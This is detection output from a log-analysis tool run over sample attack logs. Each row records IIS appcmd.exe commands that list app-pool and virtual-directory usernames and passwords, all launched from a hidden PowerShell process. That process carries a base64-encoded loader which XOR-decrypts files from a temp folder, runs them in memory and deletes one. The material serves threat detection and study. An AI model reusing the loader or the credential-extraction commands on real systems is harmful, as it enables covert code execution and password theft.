JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAA
PQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.352 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.432 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.522 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.662 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.742 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". 
)"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.822 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:vdir.name : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.893 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.973 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.063 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.143 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.233 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.323 +09:00,IEWIN7,1,informational,Process 
Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAC
sAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.403 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.473 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.563 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0Ab
wBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.784 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.894 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: 
C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWw